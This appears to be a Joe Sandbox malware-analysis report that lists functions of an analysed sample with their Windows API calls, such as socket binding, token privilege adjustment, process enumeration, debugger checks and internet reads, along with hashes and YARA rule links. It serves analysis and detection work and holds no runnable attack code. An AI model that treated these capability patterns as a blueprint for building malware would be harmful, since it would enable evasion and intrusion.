Opcode Fuzzy Hash: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
Instruction Fuzzy Hash: A4A124B1202544BAE629BA694C88F7F255CDF45345F14053FF602F62F2CA3C9D429ABE

Function 00476747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000), ref: 00477DB6

socket.WSOCK32(00000002,00000002,00000011), ref: 0047679E
WSAGetLastError.WSOCK32(00000000), ref: 004767C7
bind.WSOCK32(00000000,?,00000010), ref: 00476800
WSAGetLastError.WSOCK32(00000000), ref: 0047680D
closesocket.WSOCK32(00000000), ref: 00476821

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 77a8c2a142281090e394b0e0d14c417a392868478e52ac264b4faa38142e6d55
Instruction ID: 4f4fa4b069b112be458f20050bee2991dabce79e459f6d74e9331a247e2dcb9e
Opcode Fuzzy Hash: 77a8c2a142281090e394b0e0d14c417a392868478e52ac264b4faa38142e6d55
Instruction Fuzzy Hash: E941D275A00600AFDB10BF258C86F6E77A89F45718F05C56EFA59BB3C3CA789D008799

Function 00485376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 004853C5
IsWindowEnabled.USER32 ref: 004853D3
GetForegroundWindow.USER32(?,?,00000001), ref: 004853E0
IsIconic.USER32 ref: 004853EE
IsZoomed.USER32 ref: 004853FC

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
Instruction ID: 2bf7cd1b22f0a435aba1bf6783624a0e9851140f374647b9b1574053626a0f4e
Opcode Fuzzy Hash: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
Instruction Fuzzy Hash: BB11B232700911ABEB217F269C44A6F7B99EF447A1B40483EFC45E3242DB789C0287AD

Function 004580A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
Instruction ID: 8dae455e1ba13099d0d58f164bb34b259a0b96a713bdc7d240504e0717c8d456
Opcode Fuzzy Hash: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
Instruction Fuzzy Hash: EBF08C30200614AFEB104FA4EC8CE6B3BACEF4A755B10043EF90592251DF649C09DB64

Function 0046C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0046C432
CoCreateInstance.OLE32(00492D6C,00000000,00000001,00492BDC,?), ref: 0046C44A

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

CoUninitialize.OLE32 ref: 0046C6B7

Strings

.lnk, xrefs: 0046C3C6, 0046C3EE, 0046C3F8

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 2168bc15797479d4bf9d8be8a874f14214ce5ae81521c48187290a1a744f77cd
Instruction ID: adb56a4b7a52abdaef05598002f92e73435f728c8d9d90c66f29e414dbdf6fe1
Opcode Fuzzy Hash: 2168bc15797479d4bf9d8be8a874f14214ce5ae81521c48187290a1a744f77cd
Instruction Fuzzy Hash: 5AA14AB1104205AFD700EF55C881EAFB7E8EF85308F00492EF595972A2EB75EE09CB56

Function 00404B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00404AD0), ref: 00404B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404B57

Strings

GetNativeSystemInfo, xrefs: 00404B51
kernel32.dll, xrefs: 00404B40

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
Instruction ID: eac2b9657e48c1354d3ce07b29e145d4c0a45f8badf8df95cafcbf2a1bd35060
Opcode Fuzzy Hash: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
Instruction Fuzzy Hash: 8ED01274A10713CFD720AF31D818B0A76E4AF45751B218C3F9485D6690D678F8C4C75C

Function 0047EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0047EE3D
Process32FirstW.KERNEL32(00000000,?), ref: 0047EE4B

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Process32NextW.KERNEL32(00000000,?), ref: 0047EF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 0047EF1A

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 55b2806c571e794d70189e9b258b2a54ff26ce71ab56e674bdcd20fc5077a503
Instruction ID: a98c0e68db7b9d45d0fd814aff1298f869d04e0007e226020b87bcf654703779
Opcode Fuzzy Hash: 55b2806c571e794d70189e9b258b2a54ff26ce71ab56e674bdcd20fc5077a503
Instruction Fuzzy Hash: BB519171504300AFD310EF21CC85EABB7E8EF88714F10492EF595A72A1DB34AD08CB96

Function 0045E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 0045E628

Strings

(, xrefs: 0045E66E
|, xrefs: 0045E658

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: b3d46ec49be45c23440a31788730bf7b7fd270465164d5d236c6faca290e0b28
Instruction ID: d66d97c7bb63d5e7dad9b567a4e3f94d41a6da7275ee88609bc8c1bec3a8e44c
Opcode Fuzzy Hash: b3d46ec49be45c23440a31788730bf7b7fd270465164d5d236c6faca290e0b28
Instruction Fuzzy Hash: 21322675A007059FD728CF2AC481A6AB7F0FF48310B15C56EE89ADB3A2E774E941CB44

Function 004722EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0047180A,00000000), ref: 004723E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00472418

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: e6327bc979127c1e190f0354f51c9703924f900fef46b52be165e7f6d3ae9c94
Instruction ID: 97e6fa55f52fdedc64eb36c533065f345fcd4e8e1beeb73d4f24c64f527f6271
Opcode Fuzzy Hash: e6327bc979127c1e190f0354f51c9703924f900fef46b52be165e7f6d3ae9c94
Instruction Fuzzy Hash: 0941DA71604205BFEB20DE65DE81EFB77BCEB40314F10806FFA49A6241DABC9E419658

Function 00B91361 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00B91459
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00B91463
UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 00B91470

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: eaf3c5ba80ea6c064f96931e586c766270dfd0397236572a3a71fc29a85ca697
Instruction ID: eb4f9c2a11e1723a2b59e9f28115ece3c78b519e8a9949424074defbe0298900
Opcode Fuzzy Hash: eaf3c5ba80ea6c064f96931e586c766270dfd0397236572a3a71fc29a85ca697
Instruction Fuzzy Hash: 3E31C3749012289BCF21DF68DD89B98BBB8EF08310F5041EAE40CA7250EB309B859F45

Function 0046B333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0046B343
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0046B39D
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0046B3EA

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
Instruction ID: 737ef1c34fd19c378388d330bbb387c55d680846c188baab6e7c30573ba64571
Opcode Fuzzy Hash: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
Instruction Fuzzy Hash: 7D21AE75A10108EFCB00EFA5D880AEEBBB8FF48314F0080AAE905AB351DB359D59CB55

Function 004587E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
GetLastError.KERNEL32 ref: 00458865

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 6269b34ca0ffac1eb9693faefabfb6fb98685bcbc4fcd235cb874288e3286e77
Instruction ID: 5e41a7b511489fb1457012ee205441660039eb57adee2e696ecce50f3e5e177b
Opcode Fuzzy Hash: 6269b34ca0ffac1eb9693faefabfb6fb98685bcbc4fcd235cb874288e3286e77
Instruction Fuzzy Hash: 7511BFB2514204AFE718EFA4EC85D2BB7F8EB05315B60852EF85593212EF34BC448B64

Function 0045874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00458774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0045878B
FreeSid.ADVAPI32(?), ref: 0045879B

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
Instruction ID: 222101879978235e3db2a0a583f2c1bf244a93baf2b2f2d6b5292d8d16c370cf
Opcode Fuzzy Hash: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
Instruction Fuzzy Hash: 4CF04F7591130CBFDF00DFF4DC89AAEB7BCEF09201F104879A901E2181D7756A088B54

Function 00B93F3D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,00B93F13,00000003,00BADE80,0000000C,00B9403D,00000003,00000002,00000000,?,00B92038,00000003), ref: 00B93F5E
TerminateProcess.KERNEL32(00000000,?,00B93F13,00000003,00BADE80,0000000C,00B9403D,00000003,00000002,00000000,?,00B92038,00000003), ref: 00B93F65
ExitProcess.KERNEL32 ref: 00B93F77

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 0e020f61a98c3a92a5548f644a63fd34f34852b60483fa53a143a8b255514620
Instruction ID: 2dfa5fadff2eb12d55f47eb1728e2a3ac4e444035ea4dcacc7b56a180aadef07
Opcode Fuzzy Hash: 0e020f61a98c3a92a5548f644a63fd34f34852b60483fa53a143a8b255514620
Instruction Fuzzy Hash: 80E04631804908AFCF016F28DE08A583BF9EB45B41F044064F8059B132CB35DE82CA80

Function 00468889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 0046889B

Part of subcall function 0042520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00468F6E,00000000,?,?,?,?,0046911F,00000000,?), ref: 00425213
Part of subcall function 0042520A: __aulldiv.LIBCMT ref: 00425233

Strings

0eL, xrefs: 00468892

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID: 0eL
API String ID: 2893107130-3167399643
Opcode ID: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
Instruction ID: 2c57299538d283c5d644ae0a39161a0e0d0ec28ce0c746f6c7e9e831f8b60585
Opcode Fuzzy Hash: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
Instruction Fuzzy Hash: B421AF326256108BC729CF29D841A52B3E1EFA5311B698F6DD0F5CB2C0DA38A905CB58

Function 0046C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0046C6FB
FindClose.KERNEL32(00000000), ref: 0046C72B

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
Instruction ID: b4b64e4e0be63edce78860a78e1dfdfe78961efcf08952f795b51eb70efe8952
Opcode Fuzzy Hash: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
Instruction Fuzzy Hash: 411152726106049FDB10EF29D88592AF7E5EF85325F00C52EF9A5D7391DB34AC05CB85

Function 0046A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A0A9

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: aedf4ef7b819e7061a1d9f91078b4e07f1c96d427ff214e73d92c0d6c6dea44e
Instruction ID: 2c9db32d3ae4548df1de74cdb7d607b6943671b75e71bd67b23ca617ca970478
Opcode Fuzzy Hash: aedf4ef7b819e7061a1d9f91078b4e07f1c96d427ff214e73d92c0d6c6dea44e
Instruction Fuzzy Hash: D8F0823550522DABDB21AFA4CC48FEE776CBF08361F00416AF909E6191DA349954CBA6

Function 004581CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

